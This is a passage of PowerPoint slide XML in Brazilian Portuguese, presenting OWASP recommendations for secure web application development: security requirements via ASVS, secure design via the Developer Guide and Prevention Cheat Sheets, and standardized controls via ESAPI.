          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="3070641"/>
              <a:ext cx="5608321" cy="773044"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX1" fmla="*/ 644200 w 773043"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX2" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY2" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX3" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY3" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX4" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY4" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY5" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY6" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY7" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX8" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 5608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3043" h="5608320">
                  <a:moveTo>
                    <a:pt x="773043" y="934741"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="773043" y="4673579"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="773043" y="5189820"/>
                    <a:pt x="765092" y="5608316"/>
                    <a:pt x="755283" y="5608316"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5608316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5608316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755283" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="765092" y="4"/>
                    <a:pt x="773043" y="418500"/>
                    <a:pt x="773043" y="934741"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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61562" rIns="285387" bIns="161563" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="l" defTabSz="444500" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>Para </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
                <a:t>desenvolver</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                <a:t> uma aplicação web </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" u="sng" kern="1200" dirty="0" smtClean="0"/>
                <a:t>segura</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                <a:t> é necessário definir o que significa segurança para essa aplicação.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> O OWASP recomenda usar o </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId7"/>
                </a:rPr>
                <a:t>Padrão de Verificação</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId7"/>
                </a:rPr>
                <a:t> de Segurança de Aplicações </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId7"/>
                </a:rPr>
                <a:t>(ASVS)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> como guia para configurar os requisitos de segurança da(s) sua(s)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                <a:t> aplicação(ções).</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> Se estiver</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
                <a:t> terceirizando, considerar o </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId8"/>
                </a:rPr>
                <a:t>Anexo do Contrato</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId8"/>
                </a:rPr>
                <a:t> de Software Seguro do O</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId8"/>
                </a:rPr>
                <a:t>WASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="pt-BR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Freeform 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="2974010"/>
              <a:ext cx="940189" cy="966303"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY0" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX1" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX2" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX3" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY3" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX4" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY4" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX5" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY5" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX6" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY6" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY7" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY8" fmla="*/ 156701 h 966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0189" h="966303">
                  <a:moveTo>
                    <a:pt x="0" y="156701"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="70157"/>
                    <a:pt x="70157" y="0"/>
                    <a:pt x="156701" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="783488" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="870032" y="0"/>
                    <a:pt x="940189" y="70157"/>
                    <a:pt x="940189" y="156701"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="940189" y="809602"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="940189" y="896146"/>
                    <a:pt x="870032" y="966303"/>
                    <a:pt x="783488" y="966303"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156701" y="966303"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="70157" y="966303"/>
                    <a:pt x="0" y="896146"/>
                    <a:pt x="0" y="809602"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="156701"/>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a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>Requisitos de Segurança </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" b="1" dirty="0" smtClean="0"/>
                <a:t>de Aplicações</a:t>
              </a:r>
              <a:endParaRPr lang="pt-BR" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="4085260"/>
              <a:ext cx="5608321" cy="773044"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX1" fmla="*/ 644200 w 773043"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX2" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY2" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX3" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY3" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX4" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY4" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY5" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY6" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY7" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX8" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 5608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3043" h="5608320">
                  <a:moveTo>
                    <a:pt x="773043" y="934741"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="773043" y="4673579"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="773043" y="5189820"/>
                    <a:pt x="765092" y="5608316"/>
                    <a:pt x="755283" y="5608316"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5608316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5608316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755283" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="765092" y="4"/>
                    <a:pt x="773043" y="418500"/>
                    <a:pt x="773043" y="934741"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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61562" rIns="285387" bIns="161563" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="l" defTabSz="444500" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>Ao</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                <a:t> invés de adicionar segurança a suas aplicações, é muito mais econômico</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
                <a:t> projetar a segurança desde o princípio. O </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>OWASP recomenda</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId9"/>
                </a:rPr>
                <a:t>O</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId9"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId9"/>
                </a:rPr>
                <a:t>Guia do Desenvolvedor O</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId9"/>
                </a:rPr>
                <a:t>WASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> e </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
                <a:t>as</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId10"/>
                </a:rPr>
                <a:t>Dicas de Prevenção do OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
                <a:t>como pontos de partida para projetar segurança desde o início.</a:t>
              </a:r>
              <a:endParaRPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Freeform 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="3988629"/>
              <a:ext cx="940189" cy="966303"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY0" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX1" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX2" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX3" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY3" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX4" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY4" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX5" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY5" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX6" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY6" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY7" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY8" fmla="*/ 156701 h 966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0189" h="966303">
                  <a:moveTo>
                    <a:pt x="0" y="156701"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="70157"/>
                    <a:pt x="70157" y="0"/>
                    <a:pt x="156701" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="783488" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="870032" y="0"/>
                    <a:pt x="940189" y="70157"/>
                    <a:pt x="940189" y="156701"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="940189" y="809602"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="940189" y="896146"/>
                    <a:pt x="870032" y="966303"/>
                    <a:pt x="783488" y="966303"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156701" y="966303"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="70157" y="966303"/>
                    <a:pt x="0" y="896146"/>
                    <a:pt x="0" y="809602"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="156701"/>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rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>Arquitetura de Segurança</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" b="1" dirty="0" smtClean="0"/>
                <a:t>de</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>Aplicações</a:t>
              </a:r>
              <a:endParaRPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="5099878"/>
              <a:ext cx="5608321" cy="773044"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX1" fmla="*/ 644200 w 773043"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX2" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY2" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX3" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY3" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX4" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY4" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY5" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY6" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY7" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX8" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 5608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3043" h="5608320">
                  <a:moveTo>
                    <a:pt x="773043" y="934741"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="773043" y="4673579"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="773043" y="5189820"/>
                    <a:pt x="765092" y="5608316"/>
                    <a:pt x="755283" y="5608316"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5608316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5608316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755283" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="765092" y="4"/>
                    <a:pt x="773043" y="418500"/>
                    <a:pt x="773043" y="934741"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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61562" rIns="285387" bIns="161563" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="l" defTabSz="444500" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>Construir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                <a:t> controles de segurança fortes e fáceis de usar é extremamente difícil.  Um conjunto de controles de segurança padronizados simplifica radicalmente o desenvolvimento de aplicações seguras. O</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> OWASP recomenda o </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>Projeto</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t> da A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>PI de Segurança Empresarial</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t> do O</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>WASP (ESAPI) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t> como modelo de API de segurança necessária para produzir aplicações web seguras. A ESAPI tem implementações</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                <a:t> de referência </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>em </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>Java</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>.NET</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>PHP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>ASP Clássico</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>Python</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>, e </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>Cold Fusion</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="5003248"/>
              <a:ext cx="940189" cy="966303"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY0" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX1" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX2" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX3" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY3" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX4" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY4" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX5" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY5" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX6" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY6" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY7" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY8" fmla="*/ 156701 h 966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0189" h="966303">
                  <a:moveTo>
                    <a:pt x="0" y="156701"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="70157"/>
                    <a:pt x="70157" y="0"/>
                    <a:pt x="156701" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="783488" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="870032" y="0"/>
                    <a:pt x="940189" y="70157"/>
                    <a:pt x="940189" y="156701"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="940189" y="809602"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="940189" y="896146"/>
                    <a:pt x="870032" y="966303"/>
                    <a:pt x="783488" y="966303"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156701" y="966303"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="70157" y="966303"/>
                    <a:pt x="0" y="896146"/>
                    <a:pt x="0" y="809602"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="156701"/>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rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="pt-BR" sz="1000" b="1" dirty="0" smtClean="0"/>
                <a:t>Controles de Segurança Padronizados</a:t>
              </a:r>
